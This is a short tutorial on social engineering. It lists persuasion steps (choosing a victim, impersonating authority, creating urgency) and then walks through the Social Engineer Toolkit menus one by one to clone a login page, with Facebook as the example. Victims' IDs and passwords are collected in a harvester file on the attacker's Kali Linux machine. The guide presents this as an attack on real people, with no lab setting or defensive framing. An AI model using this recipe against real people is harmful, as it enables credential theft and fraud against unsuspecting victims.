Social Engineering using SEToolkit
Humans are the weakest link in any system. And exploiting them by treating them as an initial attack vector is called as Social Engineering. Much of the information can be found out by performing this technique. Social engineering is the art of extracting the useful information using social skills or communication skills.
The acts like dumpster diving, shoulder surfing, email spamming, sending fake emails and email bombing are also involved in the Social engineering. It can be done better on the phone than meeting personally. The steps to be followed while Social engineering can be listed as:
Choose a victim
Impersonate high in position
Expression of urgency
Persuade victim for help
Thank or appreciate profusely
Social Engineer Toolkit, also known as SET or SEToolkit is the most advance open source software that is designed to perform attacks against the weakest entity in the system i.e. humans. It comes integrated within Kali Linux to perform the social engineering attacks like phishing. Also information about people can also be harvested using their virtual social life. Websites like www.pipl.com can found out much information about people using their activeness in the social networking sites.
Deliverables:
In Kali Linux --> Terminal
~# setoolkit (Enter)
~# y (Enter)
Select (1) Social Engineering Attack
~# 1 (Enter)
Select (2) Website Attack Vectors
~# 2 (Enter)
Select (3) Credential Harvester Attack Method
~# 3 (Enter)
Select (2) Site Cloner
~# 2 (Enter)
Enter IP address for the post back. Put your (attacker’s i.e. Kali Linux’s) IP address
~# [Kali Linux IP address] (Enter)
Enter the URL to clone
Ex. ~# www.facebook.com (Enter)
Now open that IP address in victim’s browser and put id and password and login.
Those Id and passwords can be seen in the /var/www/harvester.txt file in Kali Linux.